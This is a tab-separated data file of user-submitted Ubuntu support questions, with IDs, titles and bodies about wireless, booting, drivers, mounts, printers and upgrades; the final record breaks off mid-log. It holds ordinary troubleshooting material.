368012	lost wireless on lenovo x201 running ubuntu 12.04	i was reading a forum and you seemed to have success getting wireless problems sorted . i am from a school , with a ton of old lenovo thinkpad t60 and x201 models . also some toshiba nb205 models . i 'm having trouble with intermittent wifi connection dropouts . was hoping you could help . thank you ! lenovo thinkpad t60 ( around 30-half always have working wireless , some drop it regularly ) thinkpad x201 ( around 12-same problem ) i do n't know what kind of wireless cards . all are running ubuntu 12.04 with latest updates . i am just learning how to work with the terminal and have had some success . thanks
368013	evolution : unable to open address book	after upgrading from 12.10 to 13.04 i get the following error when trying to open evolution 's addressbook : this address book can not be opened . please check that the path /home/ ... exists and that permissions are set to access it . detailed error message : can not open book : table folders has 8 columns but 6 values were supplied i installed 12.10 on another machine , copied ~/.local/share/evolution/ and ~/.config/evolution/ respectively to the new machine and still it could n't even find the addressbook . i would really appreciate if someone could free me of my misery !
368014	is there any way to run ubuntu touch 1.0 in virtualbox ?	i would love to try out ubuntu touch on my ubuntu 13.10 desktop . any way to do this ?
368015	problem with building/compiling a driver for edimax wireless adapter ew-7822uac in kubuntu 13.10 64-bit	i have a usb wireless adapter ew-7822uac from edimax , and i used to be able to build/compile a linux driver from the source that the vendor provided just by installing build-essential package on a fresh installation of ubuntu , even without updating the system . now , i have installed kubuntu 13.10 64-bit , and when i try to build the driver , i get a bunch of repeated errors and warnings and eventually the build process fails . the kernel is 3.11.0-12-generic and i did n't need to install anything other than build-essential in ( k ) ubuntu 12.04 . the following are the block of repeated warning and error that i got after i invoked make command : /home/xxx/build/rtl8812au_8821au_linux_v4.2.2_7502.20130517/os_dep/linux/os_intfs.c:601:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` bw_mode '' , s_ifreg | s_irugo , ^ /home/xxx/build/rtl8812au_8821au_linux_v4.2.2_7502.20130517/os_dep/linux/os_intfs.c:607:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_bw_mode ; any help will be greatly appreciated , but please go easy on the jargon . thanks .
368017	clock disappeared on ubuntu touch	i recently installed ubuntu touch os on my newly bought nexus 4 , but all of the sudden the clock disappeared from the top right corner as well as from the lock screen . any help or suggestions ?
368018	epson workforce 635 double sided printing help	i am new to ubuntu and i am having problems getting my epson workforce635 printer to work correctly . when i go to add a printer it shows that i have a workforce 630 instead of workforce 635 . if i use the one that it finds everything seems to work except for the double sided printing which i use alot.is there a way to fix this so i can use the double sided printing again.i cant find a driver for the epson workforce 635 either . any help would be greatly appreciated . thank you .
368019	upgrading ubuntu 11.10	it is necessary to update my ubuntu 11.10 even though i 'm happy . but now it tells me that my system will be no longer protected according to what i want to do .
368020	how i can open .kmz files ?	i am new in ubuntu-linux , and i was wondering if there is any way to open or view .kmz file-output through ubuntu-linux commands ? currently i 'm using a macbook ( xquarts ) bash-ssh connected to a remote computer . thanks in advance
368021	how do i uninstall ubuntu studio 13.04	i have an acer aspire one netbook i installed ubuntu studio because windows xp became unusable and deleted half of the files ( i didnt they just disappeared ) and now im trying to install windows 7 i have everything but my laptop is not letting me boot from my 64 gig pny flashdrive it will just resume ubuntu how do i format my hardrive deleting everything ? ? i have tried commands and everything nothing is working
368027	mounting problem	hey i got this problem on my fresh xubuntu 13.10 install i have a data device /dev/sda5 which i like to auto-mount it on startup , i added it to the /etc/fstab file uuid=261ff894-502a-4b5b-8bc7-b53a8ab8e325 /home/linuxer/data/ ext4 rw 0 0 the problem is that when the i login and access the folder it 's empty ! although when i echo the command mount it says that /dev/sda5 is mounted at /home/linuxer/data/ ! so i have to unmount it , and it displays : umount : /home/linuxer/data : not mounted but on remount , it displays well ! i 've got another line in my /etc/fstab uuid=208a8de78a8dba34 /media/win7onsada3 ntfs rw 0 0 and this one works just fine.. it auto-mounts on startup i have my system set -up with lvm support activated . any help would be appreciated ! output of blkid /dev/sda1 : label= '' recovery '' uuid= '' cc0e4d840e4d6892 '' type= '' ntfs '' /dev/sda2 : label= '' system reserved '' uuid= '' f43c763f3c75fd44 '' type= '' ntfs '' /dev/sda3 : uuid= '' 208a8de78a8dba34 '' type= '' ntfs '' /dev/sda5 : label= '' data '' uuid= '' 261ff894-502a-4b5b-8bc7-b53a8ab8e325 '' type= '' ext4 '' /dev/sda6 : uuid= '' 42de199a-60ae-48f4-93e0-1d9cb79b93a1 '' type= '' ext2 '' /dev/sda7 : uuid= '' gfz1yh-j0nl-b3l2-uxsa-7gib-hxwf-6llx2w '' type= '' lvm2_member '' /dev/mapper/distros-rootdir : uuid= '' ddce62f6-1acb-4878-a079-cc50bb7bc18d '' type= '' ext4 '' /dev/mapper/distros-home : uuid= '' 96bda727-1db2-4513-be08-a79e09fe350e '' type= '' ext4 '' /dev/mapper/cryptswap1 : uuid= '' f6f1556b-d3d2-480e-b3a1-07a79335fa4e '' type= '' swap '' output of cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/distros-rootdir / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda6 during installation uuid=42de199a-60ae-48f4-93e0-1d9cb79b93a1 /boot ext2 defaults 0 2 /dev/mapper/distros-home /home ext4 defaults 0 2 /dev/mapper/distros-swap none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 # /home/linuxer/data uuid=261ff894-502a-4b5b-8bc7-b53a8ab8e325 /home/linuxer/data/ ext4 defaults , user 0 2 # windows uuid=208a8de78a8dba34 /media/win7onsada3 ntfs rw 0 0 output of lsblk name maj : min rm size ro type mountpoint sda 8:0 0 698.7g 0 disk ├─sda1 8:1 0 14.1g 0 part ├─sda2 8:2 0 100m 0 part ├─sda3 8:3 0 200g 0 part /media/win7onsada3 ├─sda4 8:4 0 1k 0 part ├─sda5 8:5 0 300g 0 part ├─sda6 8:6 0 250m 0 part /boot └─sda7 8:7 0 184.2g 0 part ├─distros-swap ( dm-0 ) 252:0 0 5g 0 lvm │ └─cryptswap1 ( dm-3 ) 252:3 0 5g 0 crypt [ swap ] ├─distros-rootdir ( dm-1 ) 252:1 0 10g 0 lvm / └─distros-home ( dm-2 ) 252:2 0 95g 0 lvm /home sr0 11:0 1 1024m 0 rom
368029	live cd on usb key keyboard mouse do n't work	i 'm trying the mythbuntu live cd and when it boots , my wireless usb keyboard and mouse do not work . however , if i press control-alt-f1 i can get to a shell and the keyboard works . any hints ?
368030	specific editing unity 7.1.2 launcher , the padding space of the icons	in 13.10 unity , how can i edit the space between the icon itself and the padding enabled by default ? in dconf the icon size is editable . the area from the icon to the 'white ' of the editor window . i assume it 's some function that adjusts the padding when you resize , i 'd just set it to zero . i know this a bit much , but i figure if anyone would know how do this it 'd be someone on here .
368033	how do i know the persistent file size for storing changes of a bootable usb stick ?	how do i know the persistent file size for storing changes of a bootable usb stick ? i need to know : a ) the space given to persistent storage b ) how much of it is free . my idea is to copy some of my files into the usb drive until it gets full . i am asking this question in order to know when to stop . i created it using pen drive linux 's usb installer and following this instructions . thanks in advance !
368034	what has happend with my unity desktop	a couple of days ago i worked all day on my laptop at school , no problems.. then after arriving at home i powered up my laptop again and logged in . it loaded my desktop but unity was broken , i only saw my desktop wallpaper and my mouse . there was no top bar , side bar or hud , even the window decorations where gone . i tried to fix this by doing a reset of compiz < sudo dconf reset -f /org/compiz > and restart gui < sudo service lightdm restart > . i got my window decorations , sidebar and top bar back nut the top bar is not functional yet . the globalmenu is not working and i do n't have a working system tray . i 'm stuck here for two days now and no one seems to be able to help me solve my problem , not google nor irc have been successful.. i hope that anyone in here is able to help me fix unity ? my system : lenovo thinkpad w520 with optimus intel - nvidia ( bumblebee installed with nvidia-319 ) my os : ubuntu 13.10
368037	grub2 not showing even after boot-repair and easybcd entry	i have a live usb for xubuntu . i installed xubuntu once with ext4 on /dev/sda7 which ran successfully along with windows7 ( dual boot ) . however , i tried to reformat the partition into btrfs and reinstall xubuntu ( where , i set the / to /dev/sda7 ) , but ran into the following problems : during installation , i got a fatal error : grub can not be installed . now when i restarted , i was presented with nothing ... bios , an error and restart on pressing any key ( when boot from hard-disk ) , then i tried boot-repair which repaired the windows bootloader . ( there was no option for grub2 ) then i tried to install again , now grub on /dev/sda7 and it succeeded . now , windows would boot directly . no grub menu . i tried the boot-repair way again , but does n't even show grub on /dev/sda7 , tries to repair , does nothing ... tried downloading easybcd and create an entry , which when selected during boot , displays grub rescue , no options to boot into xubuntu . how do i reinstall xubuntu to /dev/sda7 with grub2 menu to select os ( dual boot ) ? here is some more info : http : //paste.ubuntu.com/6325458/
368042	unable to boot ubuntu 13.04 alongside windows 8 on a samsung series 9	after installing ubuntu 13.04 on my new samsung series 9 np900x , alongside the pre-installed windows 8 , when booting it goes directly into windows 9 . i tried fixing the problem as descrbied here : https : //help.ubuntu.com/community/boot-repair but , the problem persists . here is the error log file generated by boot-repair : http : //paste.ubuntu.com/6325540/ any suggestions on what should i try next ? thanks , -- marcos
368043	is lts nothing more than security updates ?	i switched back from ubuntu 13.10 to 12.04 and i noticed that many apps are way behind their stable releases in the 12.04 repository/software center , like gimp and texmaker , and i wonder why that is the case . what does lts really stand for when the software center has many outdated apps ?
368044	virutalbox headless vm + 3d acceleration	i have installed virtualbox on my ubuntu 13.10 ( desktop ) host , configured windows 7 guest , added extension pack and guest additions . my intention is to work on windows 7 remotely , so i have configured rdp on win7 and init.d on the host to start vm at boot in headless mode . however , i 've noticed that vm could not start with 3d acceleration in headless mode if virtualbox gui is not started ( error ) . what is interesting , that it starts from ssh console in headless mode with 3d acceleration if virtualbox ( with gui ) already started on host . what i want to know is if there is an option to start vm in headless mode with 3d acceleration without virtualbox gui started ? here is my error : error : failed to start machine . error message : this vm was configured to use 3d acceleration . however , the 3d support of the host is not working properly and the vm can not be started . to fix this problem , either fix the host 3d support ( update the host graphics driver ? ) or disable 3d acceleration in the vm settings ( verr_not_available )
368049	how to port forward and make my web open to internet ?	in my ubuntu 13.10 desktop , i downloaded lamp , i can see `` it works ! '' after typing http : //localhost . now i want my sites available to any people if they type my public ip address in any computer . i did some research , but still not work . i am using time warner cable at home wirelessly , after i know my internal ip address is 192.168.2.8 , i add these lines to /etc/network/interfaces : auto eth0 iface eth0 inet static address 192.168.2.100 netmask 255.255.255.0 gateway 192.168.2.1 broadcast 192.168.2.255 dns-nameservers 192.168.2.1 and from portforward.com , i know i should change my router setting , so i go to 192.168.2.1 which is my router address , then i moved to `` vitrul servers '' menu , add port 80 and 443 ( this is for apache this software ) . my problem comes from the first part : after i changed /etc/network/interfaes , i ca n't connect to internet ! ! why ? how can i fix this ? my second question is that : suppose i fix this , then that 's all ? can my public ip address be access from then ? or did i miss some important steps ?
368051	libreoffice problem while openning a document	my problem is that when i try to open one specific .odt document , i ca n't move the page or do anything except moving the mouse , which is useless . also , the mouse , when i 'm on the document , is freaking out switching between mouse and loader couple of times per second . it also becomes dark when i click on the document like if it 's not responding .
368052	how do i run ubuntu with complete root priviledges from the gui ?	i do n't care if it is a security vulnerability , i want to run with complete root control , and my built-in keyboard is not fully functional , so while i could use an external to set this up , i do not want to have to use a terminal to do anything of importance . i have the ability to re-install , and do not have any personal information on this computer , so if i were to get a virus and have to re-install , that would just be the price of freedom , and that is a price that i am willing to pay .
368053	please help asus f5rl wifi can not connect	i am a newbie on ubuntu . here are the details output of lspci : 00:00.0 host bridge : advanced micro devices , inc. [ amd/ati ] rc410 host bridge ( rev 01 ) 00:01.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rc4xx/rs4xx pci bridge [ int gfx ] 00:04.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rc4xx/rs4xx pci express port 1 00:06.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rc4xx/rs4xx pci express port 3 00:07.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rc4xx/rs4xx pci express port 4 00:12.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb600 non-raid-5 sata 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci0 ) 00:13.1 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci1 ) 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci2 ) 00:13.3 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci3 ) 00:13.4 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci4 ) 00:13.5 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb controller ( ehci ) 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 13 ) 00:14.1 ide interface : advanced micro devices , inc. [ amd/ati ] sb600 ide 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb600 pci to lpc bridge 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rc410m [ mobility radeon xpress 200m ] 02:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) 03:00.0 ethernet controller : qualcomm atheros attansic l2 fast ethernet ( rev a0 ) output of sudo lshw -c network : *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=wl latency=0 resources : irq:16 memory : fe9fc000-fe9fffff *-network description : ethernet interface product : attansic l2 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : a0 serial : 00:1e:8c : d2:95 : ff capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl2 driverversion=2.2.3 firmware=l2 latency=0 link=no multicast=yes port=twisted pair resources : irq:40 memory : feac0000-feafffff memory : feaa0000-feabffff
368056	ubuntu can not see windows 7 ( includes boot-repair results and partition configurations )	( i think this may be because my laptop is uefi ? ? ? ) edit : here are the results from my boot repair : http : //paste.ubuntu.com/6326055/ i have windows 7 already installed and if i try and install ubuntu it doesnt recognize me having any os already installed . i have seen this post : ubuntu 12.04 installer does not see windows already installed on my computer so i booted ubuntu up from the disc and executed : sudo os-prober which gave me : /dev/sda1 : windows 7 ( loader ) : windows : chain i did not get a second line showing something line ( as per the above link ) : /dev/sda3 : windows recovery environment ( loader ) : windows1 : chain i then did : sudo dmraid -re but it said : no raid disks so i did : sudo apt-get -y remove dmraid which seemed to do a few things : 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded but when i tried os-prober again it showed me exactly the same as before , i didnt get the second line referring to recovery environment . can someone please help ? i have tried 3 different installations and every single one the same . edit this is a laptop ( with uefi i think ) so i doubt there is any raid edit2 just tried this but to no avail : sudo add-apt-repository ppa : yannubuntu/boot-repair sudo apt-get update sudo apt-get install -y boot-repair edit3 : disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x23610870 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 40962047 20377600 6 fat16 /dev/sda3 40962048 71682047 15360000 6 fat16 /dev/sda4 71682048 250066943 89192448 7 hpfs/ntfs/exfat edit4 : ubuntu @ ubuntu : ~ $ sudo lsblk -o name , fstype , size , mountpoint , label name fstype size mountpoint label sda 119.2g ├─sda1 ntfs 100m system reserved ├─sda2 19.4g ├─sda3 14.7g └─sda4 ntfs 85.1g sr0 iso9660 708m /cdrom ubuntu 12.04.3 lts amd64 loop0 squashfs 666.6m /rofs windows 7 is in the 85.1g sda4 partition ... .. edit5 : ran boot-repair : http : //paste.ubuntu.com/6326055/
368059	nfs share will not mount as udp , but will as tcp	my nfs share on my windows 8 pc , which is running hanewin , wo n't mount as udp , but mounts fine as tcp . when i try to mount the share with the command : sudo mount -o udp , nolock 192.168.1.xo : /libraries /home/joe/libraries mount : no type was given - i 'll assume nfs because of the colon mount.nfs : timeout set for mon oct 28 16:14:19 2013 mount.nfs : trying text-based options 'udp , nolock , vers=4 , addr=192.168.1.xo , clientaddr=192.168.1.xx ' mount.nfs : mount ( 2 ) : protocol not supported mount.nfs : trying text-based options 'udp , nolock , addr=192.168.1.xo ' mount.nfs : prog 100003 , trying vers=3 , prot=17 mount.nfs : portmap query failed : rpc : timed out mount.nfs : trying text-based options 'udp , nolock , vers=4 , addr=192.168.1.xo , clientaddr=192.168.1.xx' mount.nfs : mount ( 2 ) : protocol not supported mount.nfs : trying text-based options 'udp , nolock , addr=192.168.1.xo' mount.nfs : prog 100003 , trying vers=3 , prot=17 mount.nfs : portmap query failed : rpc : timed out mount.nfs : trying text-based options 'udp , nolock , vers=4 , addr=192.168.1.xo , clientaddr=192.168.1.xx' mount.nfs : mount ( 2 ) : protocol not supported mount.nfs : trying text-based options 'udp , nolock , addr=192.168.1.xo' mount.nfs : prog 100003 , trying vers=3 , prot=17 mount.nfs : portmap query failed : rpc : timed out mount.nfs : trying text-based options 'udp , nolock , vers=4 , addr=192.168.1.xo , clientaddr=192.168.1.xx' mount.nfs : mount ( 2 ) : protocol not supported mount.nfs : trying text-based options 'udp , nolock , addr=192.168.1.xo' mount.nfs : prog 100003 , trying vers=3 , prot=17 mount.nfs : portmap query failed : rpc : timed out mount.nfs : trying text-based options 'udp , nolock , vers=4 , addr=192.168.1.xo , clientaddr=192.168.1.xx' mount.nfs : mount ( 2 ) : protocol not supported mount.nfs : trying text-based options 'udp , nolock , addr=192.168.1.xo' mount.nfs : prog 100003 , trying vers=3 , prot=17 and it just keeps going until it times out . any help would be greatly appreciated .
368062	date and time panel is greyed out , how do i restore it ?	date and time is showing in the login screen ( unity-greeter ) but not when i login to my session . when i go to date and time settings the panel is all grey : any idea how to recover from this ?
368063	is it possible to make ubuntu switch workspaces on a timed interval ?	i have a computer hooked up to a television that i am using to show different data . i would like to setup some different programs on different workspaces and have it rotate the workspaces automatically on a timed basis . how would i make this happen ?
368068	how will people upgrade from 12.10 to later releases after 13.04 is eol ?	looking at https : //wiki.ubuntu.com/releases 13.04 will reach eol in january 2014 , while 12.10 will reach eol in april 2014 , therefore if a 12.10 user has n't upgraded to 13.04 and subsequently to 13.10 , there will be a 3 month period where a 12.10 user has a supported version of ubuntu , but will be unable to upgrade . i asked this question a number of months ago and the suggestion was that the hope was that there would be an upgrade path from 12.10 to 14.04 . could somebody confirm whether this is still the case , or if not what the plans are for 12.10 users after 13.04 becomes eol . edited for clarification the particular issue i was concerned about is that once 13.04 goes eol , a 12.10 user would in theory lose the ability to upgrade once the 13.04 repo 's are removed from the normal release repository . using the old releases method would be a way around the issue , however would make it more complicated for a less experienced user . an alternative could be for the 13.04 repo 's to be left available for the 3 month interim period so that a 12.10 version could still be upgraded to 13.04 and subsequently onto 13.10 , however that does n't seem an optimal solution in that users may consider that it meant that support for 13.04 was being continued . if a direct upgrade from 12.10 to 14.04 was to made available , this would only be available once 14.04 was released and still leaves the issue of the 3 months between january and april 2014 were there may be some confusion . i suspect that its not going to affect a significant number of users , if somebody has upgraded from 12.04lts to 12.10 , in all probability , they 'll have continued to upgrade to 13.04 and upwards because they 'd made the choice to use current rather than lts releases . it would just be useful to have some clarification of the situation which people can be referred to in advance of 13.04 going eol rather than hitting the cut off point and it being too late for users to make the decision and being left in limbo .
368072	xmodmap configuration	i am trying to configure my keyboard to be able to type german characters without trying to learn another completely different keyboard layout . i found the exact stuff that i need to do to xmodmap : ! map umlauts to right alt + < key > keycode 108 = mode_switch keysym e = e e eurosign keysym c = c c cent keysym a = a a adiaeresis adiaeresis keysym o = o o odiaeresis odiaeresis keysym u = u u udiaeresis udiaeresis keysym s = s s ssharp but my problem is , i do n't know how to do that . i found some info on how to switch keys , as in page up to where delete is and delete to where page up is , but that is n't what i 'm trying to do and my nooby self could n't figure out how to apply that info to this different situation . i do n't even know how to get to xmodmap up really . so if anyone knows how to edit xmodmap to do the things that i need to do to it , i would greatly appreciate it if you would share that info . : )
368074	how do i get an epson sx235w printer working ?	i have just installed ubuntu on my laptop . but have a problem getting my epson sx235w to work . i have installed the printer after finding the driver software , however when i try to print a document the printer just spits out sheet after sheet of blank paper until i switch the printer off . please help . tony
368075	dropbox not starting - ubuntu 13.04 server eddition	i am running a 32 bit installation of ubuntu 13.04 server edition and watching top shows nothing . what i did was run : cd ~ & & wget -o - `` https : //www.dropbox.com/download ? plat=lnx.x86 '' | tar xzf - then ~/.dropbox-dist/dropboxd but after this command - nothing happens at all , ever ... when i run top in another terminal and watch it , an ssh command starts and instantly stops and there 's nothing else . whats going on ?
368077	very slow wifi after upgrading from 13.04 to 13.10	i upgraded yesterday from ubuntu 13.04 to ubuntu 13.10 and now my wifi connection is incredibly slow . ping google.com takes upto 270 ms with 46 % packet loss edit : it appears that this issue is intermittent . however my other laptop on the same network was working at normal speed throughout which should rule out my connection .
368079	cmus is not playing after disabling pulseaudio and installing alsa	i did this because i intend to play osu ! with wine , something that is very hard when there is huge amounts of latency . ( i followed this guide : the link ) sadly , it seems that cmus is configured for pulseaudio , so when i try to play music using it , it shows the error `` error : opening audio device : internal error '' . how do i fix this ?
368088	after upgrading from 13.04 to 13.10 i can not get any image to display on the login screen , why ?	i can login in without any issue & can display any image as my wallpaper . but the default image does not display . i 've even tried using ubuntu-tweak to change the image , but all that is displayed is a plain black screen , with the user list . i 've tried looking at dmesg , xorg.0.log , syslog , user.log , but can find no indication as to what is the cause . so can anyone help me ? thanks .
368091	trouble with devices	i am newbie with ubuntu . i thought i should start working on ubuntu with gammu because i heard many good things about it , but all day i spent working on it , with no results . i have installed ubuntu 12.04 webserver with apache php and mysql . i installed gammu from the ubuntu software center . connected 2 d-link usb which are showing in `` lsusb '' see : bus 002 device 002 : id 1a40:0101 terminus technology inc. 4-port hub bus 008 device 002 : id 04b3:3107 ibm corp. thinkpad 800dpi optical travel mouse bus 008 device 003 : id 413c:2107 dell computer corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 005 : id 2001 : a706 d-link corp . bus 002 device 006 : id 07d1:7e11 d-link system when i restart , it does not show like ttyusb0 , but after sometimes it shows like : root @ sms : ~ # ls -l /dev/ttyusb* crw-rw -- -- 1 root dialout 188 , 0 oct 30 00:53 /dev/ttyusb0 crw-rw -- -- 1 root dialout 188 , 1 oct 30 00:52 /dev/ttyusb1 crw-rw -- -- 1 root dialout 188 , 2 oct 30 00:52 /dev/ttyusb2 i have added gammurc and also gammu-smsdrc in /etc directory and added code : [ gammu ] device = /dev/ttyusb1 connection = at i tried usb0 and 2 also , but when i enter gammu -- identify it says : no response in specified timeout . probably phone not connected . i have also showing one device in the network . please help me , i really want to get it done .
368092	analog audio device not available in sound settings	ubuntu 13.10 installed fresh ( not upgraded ) on an intense pc ( analog and s/pdif share same jack ) analog audio output used to work just fine , but now does not appear in sound settings anymore ; only `` digital output ( s/pdif ) built-in audio '' is shown . i never used s/pdif output ; maybe it works , but it 's currently useless for me - if i choose it , nothing goes to the speakers . aplay -l shows default playback/recording through the pulseaudio sound server sysdefault : card=pch hda intel pch , alc888 analog default audio device front : card=pch , dev=0 hda intel pch , alc888 analog front speakers ( ... ) playing to these devices with aplay -d < device > /usr/share/sounds/alsa/front_center.wav : '' default '' - everything is silent . `` sysdefault '' - sound plays to the speakers normally ( hw is ok ! ) . for any other device i get an error aplay : set_params:1239 : channels count non available i 've found a partial workaround : i installed pavucontrol , and from its configuration tab i can choose `` analog stereo sutput '' and then all applications play audio normally ( including aplay to `` default '' ) . but , there is still no `` analog output '' option in the system settings ( only s/pdif ) , and no audio control in the menu bar ; i have to do everything from pavucontrol .
368093	ca n't alter display settings . trying to configure external monitor	i just bought an external monitor to go with my laptop . the computer is an hp elitebook 6930p . i 'm using ubuntu 12.04 with the cinnamon desktop . the external monitor actually works fine right out of the box . as of now it is acting as an extension of the laptop screen . my problem is that i want to configure ubuntu to display only on the external monitor , or at least show the launch bar and start menu on the monitor , as i would like to close the computer and still be able to use it . *unfortunately i ca n't make any changes to the display settings . even if i do n't change anything , the act of hitting the `` apply '' button brings this message : '' failed to apply configuration : % s gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `org.gnome.settingsdaemon.xrandr_2 ' on object at path /org/gnome/settingsdaemon/xrandr '' obviously i can not choose to `` mirror displays '' . i can not change any display settings . any solution or workaround would be greatly appreciated .
368102	nvidia geforce4 mx 440 with agp8x in ubuntu 13.10	how i can install the driver for nvidia geforce4 mx 440 with agp8x in ubuntu 13.10 ? or is n't supported by this ubuntu version ?
368107	asus p5k se - ubuntu 21.04.3	ti installed last version of ubuntu 12.04.3 lts in a computer with asus pk5-se motherboard in an ide hard drive . installations was ok , but grub does n't boot from this ide disk . screen turn black and a blink cursor appears . i 'm googling , and it 's possible a problem with marvell 88se6111 ide controller . any suggestion ? thanks ! about testing and results : for installation , i 'm using an livecd usb and installation in the ide device finish ok , so problem is booting . i installed last bios version available . i 'm testing with only one device plug , so conflicts between storage devices are not possible . my test : i tested boot from various ide hds with ubuntu installation and from a ide dvd with a livecd , and not boot . before load grub , with a ascii mode black background screen , show a fast message `` checking vram '' in the bottom of the screen , next a cursor in the first line and finally the cursor down to the second line and stop here . i can reset with `` ctrl + spr '' . i tested boot from sata hd with ubuntu installation and all go right . conclusion : i thought that it was a linux problem , but googling in internet , i found a lot of problems ( linux and windows problems ) booting from ide devices in this motherboard , so i think that it 's not possible fix it .
368110	vmware software installation error	i am trying to install vmware software , but i am facing the following error : selecting previously unselected package vmware-view-client : i386 . ( reading database ... 239594 files and directories currently installed . ) unpacking vmware-view-client : i386 ( from ... /vmware-view-client_2.1.0-0ubuntu0.12.04_i386.deb ) ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... setting up icaclient : i386 ( 12.1.0 ) ... dpkg : error processing icaclient : i386 ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up vmware-view-client : i386 ( 2.1.0-0ubuntu0.12.04 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : icaclient : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up icaclient : i386 ( 12.1.0 ) ... dpkg : error processing icaclient : i386 ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : icaclient : i386 any suggestions on how to fix this issue ? thanks in advance
368113	which os do i use to install ubabtu ?	i have windows 8 pro installed on a mac pro desktop 27 '' . will the installation for the windows work or do i use a mac , to install ubuntu ? thanks for the help
368121	list of installed fonts that support a certain character	how can i find out which fonts on my system include coverage of a certain character , for example , u+2192 ? i 've tried looking in character map , but i do n't see a way to query fonts by character , only characters by font .
368122	move window to workspace problem with disappearing window	when i want move window to some workspace by right click on top and in menu select move right or move to workspace ( number ) window disappear and i cant find it but app still running ? but when i keyboard shortcut shift + ctrl + alt + right work well . please help me with this problem ?
368125	getting error in running first apt-get update & & apt-get upgrade after installation of ubuntu 12.10	i get e : some index files failed to download . they have been ignored , or old ones used instead . when i run sudo apt-get update for the first time after installation of ubuntu 12.10 . tried changing the server to the best chosen source . still the problem exist .
368126	wifi keeps droping every minute on ubuntu 12.04	i am running ubuntu 12.04 on my samsung laptop but the wifi connection keeps dropping every minute . i have another dell laptop which also has ubuntu 12.04 but wifi works fine on that . and if i use my samsung laptop at office as its my office laptop wifi works fine . so , i do n't understand what the problem is . i have googled it and found solution like set ignoring ipv6 setting but that still does not make any difference . so i do n't understand where the problem is if its with my network provider or its with my laptop . i ca n't blame my network provider as wifi works fine on my other devices including ipad , mobiles and dell laptop . even i ca n't say clearly that its problem with my laptop as wifi works fine in my office . previously i had ubuntu 13.04 on my samsung laptop and i was having the same issue so i uninstall it and install 12.04 and issues is still the same . i ran following commends with output lsmod | grep rtl shows nothing iwconfig | grep power lo no wireless extensions . eth0 no wireless extensions . power management : off cat /var/log/syslog | grep -e etwork -e wlan | tail -n20 oct 29 21:49:05 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... oct 29 21:49:05 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] oct 29 21:49:05 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > activation ( eth0 ) beginning ip6 addrconf . oct 29 21:49:05 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . oct 29 21:49:25 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > ( eth0 ) : ip6 addrconf timed out or failed . oct 29 21:49:25 hgill-rf511-rf411-rf711 networkmanager [ 833 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... oct 